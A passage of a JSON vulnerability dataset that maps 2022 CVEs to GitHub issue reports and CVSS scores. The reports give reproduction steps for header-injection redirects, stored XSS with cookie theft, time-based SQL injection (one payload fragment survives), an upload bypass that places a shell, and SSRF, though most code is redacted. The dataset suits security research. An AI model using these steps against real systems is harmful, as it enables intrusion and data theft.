dropdown menu beside APITAG for Week NUMBERTAG Notice that a new entry has been created with the date NUMBERTAG Expected behavior APITAG required\" error. What do you see instead: The response body contains the date of the entry NUMBERTAG Screenshots FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.3,
        "impactScore": 1.4,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-27109",
        "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1174",
        "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1174",
        "Repo_new": "orangehrm/orangehrm",
        "Issue_Created_At": "2022-03-10T13:56:26Z",
        "description": "Referer header injection redirect vulnerability. Environment details APITAG version NUMBERTAG APITAG source: Release build from Sourceforge URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug This is similar to the Host header injection redirect vulnerability, except the issue lies in the Referer header and the vulnerable endpoints are different . To Reproduce NUMBERTAG Login to the APITAG application NUMBERTAG Navigate to \"My Info NUMBERTAG Under APITAG Attachment\", click on APITAG NUMBERTAG Turn on Intercept in Burp Suite (or any other web proxy NUMBERTAG Select any PNG file and Click on APITAG NUMBERTAG Change the value of the Referer header to APITAG NUMBERTAG Click on Forward in Burp and turn off Intercept NUMBERTAG You will notice that the page gets redirected to APITAG Expected behavior A ERRORTAG error. What do you see instead: A NUMBERTAG redirect to the malicious domain. Screenshots FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-27110",
        "Issue_Url_old": "https://github.com/orangehrm/orangehrm/issues/1175",
        "Issue_Url_new": "https://github.com/orangehrm/orangehrm/issues/1175",
        "Repo_new": "orangehrm/orangehrm",
        "Issue_Created_At": "2022-03-10T13:56:28Z",
        "description": "Host header injection redirect vulnerability. Environment details APITAG version NUMBERTAG APITAG source: Release build from Sourceforge URLTAG or Git clone Platform: Ubuntu PHP version NUMBERTAG Database and version: APITAG NUMBERTAG Web server: Apache NUMBERTAG If applicable: Browser: Firefox Describe the bug When an authenticated user submits the APITAG Details\" form, a NUMBERTAG redirect to the APITAG Details\" URL is sent in the response. Following is a request and its response\u2014 CODETAG Response: CODETAG It was noticed that upon manipulating the Host header, in the POST request, to an arbitrary domain, it was possible to inject the Host header into the URL redirection in the NUMBERTAG response. A user would then be redirected to the arbitrary domain. For example, the domain APITAG can be passed as the value of the Host header in the POST request. The resulting NUMBERTAG response redirects the user to URLTAG Due to the nature of this vulnerability, it can be used in phishing attacks. Following are the endpoints in the APITAG application that are vulnerable to the Host Header Injection Redirect vulnerability NUMBERTAG PATHTAG NUMBERTAG PATHTAG To Reproduce NUMBERTAG Login to the APITAG application NUMBERTAG Navigate to \"My Info NUMBERTAG Under APITAG Details\", click on APITAG NUMBERTAG Turn on Intercept in Burp Suite (or any other web proxy NUMBERTAG Click on APITAG NUMBERTAG Change the value of the Host header to APITAG NUMBERTAG Click on Forward in Burp and turn off Intercept NUMBERTAG You will notice that the page gets redirected to APITAG Expected behavior A ERRORTAG error. What do you see instead: A NUMBERTAG redirect to the malicious domain. Screenshots FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-27111",
        "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/32",
        "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/32",
        "Repo_new": "jflyfox/jfinal_cms",
        "Issue_Created_At": "2022-03-10T14:43:57Z",
        "description": "A stored XSS vulnerability in the feedback function module of jfinal_cms NUMBERTAG There is a stored XSS vulnerability in the feedback function module of jfinal_cms NUMBERTAG There is a stored XSS vulnerability in the feedback of jfinal_cms. An attacker can insert malicious XSS code into the feedback content. When the administrator views the feedback list in the background, the malicious XSS code is successfully triggered. First register for a user test, then enter the feedback page, insert malicious XSS attack code in the feedback content: Payload : APITAG APITAG Then, when the administrator views the feedback in the background, the malicious XSS code is successfully triggered, and there is no need to click on the corresponding feedback, it can be triggered only on the list page. FILETAG Administrators view the feedback list: FILETAG Successfully executed malicious XSS code: FILETAG Safety advice: Strictly filter the user's input Strict control of page rendering content",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-27114",
        "Issue_Url_old": "https://github.com/michaelrsweet/htmldoc/issues/471",
        "Issue_Url_new": "https://github.com/michaelrsweet/htmldoc/issues/471",
        "Repo_new": "michaelrsweet/htmldoc",
        "Issue_Created_At": "2022-03-10T05:57:25Z",
        "description": "Two Integer Overflow bugs in APITAG Hi, there is two integer overflow bugs in the latest version of htmldoc. They are similar to CVETAG CVETAG . os: ubuntu NUMBERTAG ersion NUMBERTAG the latest) First First, in image_load_jpeg function, APITAG When it calls malloc\uff0c'img >width' and 'img >height' are enough large to cause an integer overflow So, the malloc function may return a heap block smaller than the expected size, and it will cause a buffer APITAG boundary error in the jpeg_read_scanlines function. URLTAG URLTAG Asan report: ERRORTAG And this is the poc file\uff1a FILETAG Second There is another integer overflow bug in image_load_png function, APITAG similar to the first one. URLTAG It calls calloc to get heap block. However, the width and height of the png file are both four bytes long, so 'img >width' and 'img >height' are enough large to cause an integer overflow. The calloc function may return a heap block smaller than the expected size, and finally cause a heap overflow in the png_read_rows function when memcpy. This is the Asan report: ERRORTAG And this is the poc file: FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27115",
        "Issue_Url_old": "https://github.com/Studio-42/elFinder/issues/3458",
        "Issue_Url_new": "https://github.com/studio-42/elfinder/issues/3458",
        "Repo_new": "studio-42/elfinder",
        "Issue_Created_At": "2022-02-20T17:25:31Z",
        "description": "Filename bypass leading to RCE. Describe the bug Filename bypass leading to Remote Code Execution To Reproduce Steps to reproduce the behavior NUMBERTAG Upload a file with APITAG named FILETAG , Note: the letter 'a' at the beginning of the content cannot be omitted NUMBERTAG Add two dots after the file name like this APITAG NUMBERTAG The shell file is successfully uploaded by bypassing detection and can be accessed via APITAG NUMBERTAG This vulnerability can only be exploited on windows systems. Screenshots FILETAG Desktop (please complete the following information): OS: Windows",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27145",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2108",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2108",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-02-08T04:22:07Z",
        "description": "There is a statck overflow detected by APITAG Description There is a statck overflow detected by APITAG System info CODETAG Build command APITAG crash command APITAG Pocs FILETAG Crash output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27146",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2120",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2120",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-02-16T11:57:40Z",
        "description": "There is a heap buffer overflow detected by APITAG Description There is a heap buffer overflow detected by APITAG System info CODETAG Build command APITAG crash command APITAG Pocs FILETAG Crash output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27147",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2109",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2109",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-02-08T04:23:02Z",
        "description": "There is a use after free detected by APITAG Description There is a use after free detected by APITAG System info CODETAG Build command APITAG crash command APITAG Pocs FILETAG Crash output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27148",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/2067",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/2067",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2022-01-26T05:27:46Z",
        "description": "Signed integer overflow. Description There are some signed integer overflow caused runtime error and are detected by APITAG System info CODETAG Build command APITAG Crash command APITAG isma timescale NUMBERTAG out /dev/null poc_file Pocs POCs URLTAG Crash output poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG poc NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27156",
        "Issue_Url_old": "https://github.com/daylightstudio/FUEL-CMS/issues/593",
        "Issue_Url_new": "https://github.com/daylightstudio/fuel-cms/issues/593",
        "Repo_new": "daylightstudio/fuel-cms",
        "Issue_Created_At": "2022-03-13T16:39:35Z",
        "description": "HTML Injection Issue. A HTML Injection issue is affecting the application. STEP NUMBERTAG FILETAG STEP NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-27161",
        "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/43",
        "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/43",
        "Repo_new": "cskaza/cszcms",
        "Issue_Created_At": "2022-03-14T03:38:29Z",
        "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27162",
        "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/44",
        "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/44",
        "Repo_new": "cskaza/cszcms",
        "Issue_Created_At": "2022-03-14T03:39:56Z",
        "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27163",
        "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/45",
        "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/45",
        "Repo_new": "cskaza/cszcms",
        "Issue_Created_At": "2022-03-14T03:44:05Z",
        "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27164",
        "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/42",
        "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/42",
        "Repo_new": "cskaza/cszcms",
        "Issue_Created_At": "2022-03-14T03:37:15Z",
        "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27165",
        "Issue_Url_old": "https://github.com/cskaza/cszcms/issues/41",
        "Issue_Url_new": "https://github.com/cskaza/cszcms/issues/41",
        "Repo_new": "cskaza/cszcms",
        "Issue_Created_At": "2022-03-14T03:35:23Z",
        "description": "SQL Injection vulnerability on APITAG Exploit Title: SQL Injection vulnerability on APITAG Date NUMBERTAG March NUMBERTAG Exploit Author: MENTIONTAG URLTAG Software Link: FILETAG Version NUMBERTAG Description: SQL Injection allows an attacker to run malicious SQL statements on a database and thus being able to read or modify the data in the database. With enough privileges assigned to the database user, it can allow the attacker to delete tables or drop databases. Code Analysis: CODETAG FILETAG payload: 'or(sleep NUMBERTAG URL encode all characters payload: APITAG PATHTAG FILETAG Impact: Read and modify the users database Mitigation: Use of Parameterized SQL Queries and Validation",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27333",
        "Issue_Url_old": "https://github.com/Cutegod/idcCMS/issues/1",
        "Issue_Url_new": "https://github.com/cutegod/idccms/issues/1",
        "Repo_new": "Cutegod/idcCMS",
        "Issue_Created_At": "2022-03-15T08:04:41Z",
        "description": "IDCCMS reset CMS Vulnerability . IDCCMS reset CMS Vulnerability Impact version\uff1aIDCCMS NUMBERTAG Download link\uff1a FILETAG System background administrator zone program file check non program file check FILETAG Use burp to capture packets and modify the path to access the cache / web path FILETAG FILETAG Read the current cache / web path and delete APITAG file FILETAG Deleted successfully FILETAG CMS reset can be achieved by visiting the link installation address URLTAG URLTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27365",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/12",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/12",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-03-16T01:45:29Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG SQL injection vulnerability exists in Cscms music portal system NUMBERTAG There is a SQL blind injection vulnerability in APITAG Details Add a song after administrator login FILETAG POC CODETAG FILETAG When deleting songs in the recycle bin, construct malicious statements and implement sql injection CODETAG FILETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds Vulnerability source code FILETAG Close \"id\" to achieve blind injection, so the vulnerability exists",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-27366",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/13",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/13",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-03-16T01:58:50Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG There is a SQL blind injection vulnerability in APITAG Details Add a song after administrator login FILETAG Add songs first and then delete them into the trash FILETAG FILETAG When restoring songs in the recycle bin, construct malicious statements and implement sql injection FILETAG CODETAG The parameter \"id\" exists time blind, sleeps for NUMBERTAG seconds FILETAG construct payload CODETAG In the figure below, you can see that the first letter of the database is \"c\", so it sleeps for NUMBERTAG seconds to verify that the injection exists FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-27367",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/14",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/14",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-03-16T02:17:57Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system APITAG There is a SQL blind injection vulnerability in APITAG Details After the administrator is logged in, you need to add a song album FILETAG CODETAG FILETAG When deleting a song album, malicious statements can be constructed to achieve sql injection FILETAG CODETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG contrust payload CODETAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds Vulnerability source code FILETAG Close \"id\" to achieve blind injection, so the vulnerability exists",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-27368",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/15",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/15",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-03-16T02:25:23Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG SQL injection vulnerability exists in Cscms music portal system NUMBERTAG APITAG Details After the administrator logs in, the following data package is constructed CODETAG The payload executes and sleeps for NUMBERTAG seconds FILETAG construct payload APITAG FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds Vulnerability source code FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-27369",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/16",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/16",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-03-16T02:46:24Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system APITAG There is a SQL blind injection vulnerability in APITAG Details After the administrator is logged in, a news needs to be added FILETAG CODETAG FILETAG delete this article to trash",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-27416",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/702",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/702",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2022-02-05T08:53:25Z",
        "description": "Bug] Double free. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the [tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug Double free in tcpreplay. To Reproduce Steps to reproduce the behavior NUMBERTAG export CFLAGS=\" g fsanitize=address\" export CXXFLAGS=\" g fsanitize=address NUMBERTAG configure disable local libopts NUMBERTAG make NUMBERTAG tcprewrite i POC1 o /dev/null ASAN ERRORTAG System (please complete the following information): Ubuntu NUMBERTAG LTS, gcc version NUMBERTAG APITAG NUMBERTAG ubuntu NUMBERTAG tcprewrite V ERRORTAG Additional context Add any other context about the problem here.",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27418",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/703",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/703",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2022-02-05T10:45:27Z",
        "description": "Heap buffer overflow in tcpreplay. You are opening a _bug report_ against the Tcpreplay project: we use APITAG Issues for tracking bug reports and feature requests. If you have a question about how to use Tcpreplay, you are at the wrong site. You can ask a question on the tcpreplay users mailing list URLTAG or on Stack Overflow with [tcpreplay] tag URLTAG . General help is available FILETAG . If you have a build issue, consider downloading the latest release URLTAG Otherwise, to report a bug, please fill out the reproduction steps (below) and delete these introductory paragraphs. Thanks! Describe the bug heap buffer overflow in tcpreplay To Reproduce Steps to reproduce the behavior NUMBERTAG export CFLAGS=\" g fsanitize=address\" export CXXFLAGS=\" g fsanitize=address NUMBERTAG configure disable local libopts NUMBERTAG make NUMBERTAG tcpreplay edit r NUMBERTAG s NUMBERTAG b C m NUMBERTAG P oneatatime i lo POC NUMBERTAG FILETAG ASAN ERRORTAG System (please complete the following information): Ubuntu NUMBERTAG LTS, gcc version NUMBERTAG APITAG NUMBERTAG ubuntu NUMBERTAG Tcpreplay Version [e.g NUMBERTAG ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27419",
        "Issue_Url_old": "https://github.com/merbanan/rtl_433/issues/2012",
        "Issue_Url_new": "https://github.com/merbanan/rtl_433/issues/2012",
        "Repo_new": "merbanan/rtl_433",
        "Issue_Created_At": "2022-03-18T01:29:06Z",
        "description": "Stack based Buffer Overflow in rtl NUMBERTAG Command APITAG FILETAG ASAN CODETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-27420",
        "Issue_Url_old": "https://github.com/kishan0725/Hospital-Management-System/issues/19",
        "Issue_Url_new": "https://github.com/kishan0725/hospital-management-system/issues/19",
        "Repo_new": "kishan0725/hospital-management-system",
        "Issue_Created_At": "2022-02-11T04:00:00Z",
        "description": "VULNERABLE: SQL Injection in Hospital Management System. SQL injection in FILETAG via the 'patient_contact' param. Create a request to ' FILETAG ': FILETAG Save this request to FILETAG file: FILETAG Run APITAG for the attack: APITAG FILETAG Area of concern in patientsearch.php FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27428",
        "Issue_Url_old": "https://github.com/bensonarts/GalleryCMS/issues/20",
        "Issue_Url_new": "https://github.com/bensonarts/gallerycms/issues/20",
        "Repo_new": "bensonarts/gallerycms",
        "Issue_Created_At": "2022-03-18T05:30:44Z",
        "description": "NUMBERTAG stored XSS Vulnerability. Alert users who are still using the project Conditions: Common user The album name can inject XSS APITAG Introduce hook. Js of beef FILETAG XSS is triggered when the administrator goes online FILETAG Beef goes online and gets the cookie FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-27429",
        "Issue_Url_old": "https://github.com/Cherry-toto/jizhicms/issues/67",
        "Issue_Url_new": "https://github.com/cherry-toto/jizhicms/issues/67",
        "Repo_new": "cherry-toto/jizhicms",
        "Issue_Created_At": "2022-03-18T13:32:51Z",
        "description": "NUMBERTAG SSRF Vulnerability. SSRF vulnerability with echo exists in the CMS background, and attackers can use this vulnerability to scan local and Intranet ports and attack local and Intranet Jizhicms background. Attackers can use this vulnerability to scan local and Intranet ports, attack local and Intranet services, or carry out DOS attacks The vulnerability is located in the background plug in download function I start a locally accessible Web service with a FILETAG file FILETAG FILETAG \u4f7f\u7528payload CODETAG See the response FILETAG Browser access APITAG FILETAG open by notepad FILETAG As with FILETAG , this was read successfully",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27431",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/200",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/200",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2022-03-18T07:58:14Z",
        "description": "Wuzhicms NUMBERTAG PATHTAG hava a SQL Injection Vulnerability . Vulnerability file: PATHTAG public function APITAG { if(isset($GLOBALS FILETAG The vulnerability is located in the management member > member group management list > delete operation FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27466",
        "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/90",
        "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/90",
        "Repo_new": "ming-soft/mcms",
        "Issue_Created_At": "2022-03-20T06:17:38Z",
        "description": "MCMS NUMBERTAG SQLI. A suspicious point was found in the FILETAG file in the lib,ms mdiy NUMBERTAG FILETAG NUMBERTAG APITAG Since the query maps to a method in Java, and this XML corresponds to Content,we looked directly in APITAG and found a call to APITAG query APITAG we can know that the suspicious injection point is APITAG and then try to inject CODETAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-27470",
        "Issue_Url_old": "https://github.com/libsdl-org/SDL_ttf/issues/187",
        "Issue_Url_new": "https://github.com/libsdl-org/sdl_ttf/issues/187",
        "Repo_new": "libsdl-org/sdl_ttf",
        "Issue_Created_At": "2022-03-19T11:11:01Z",
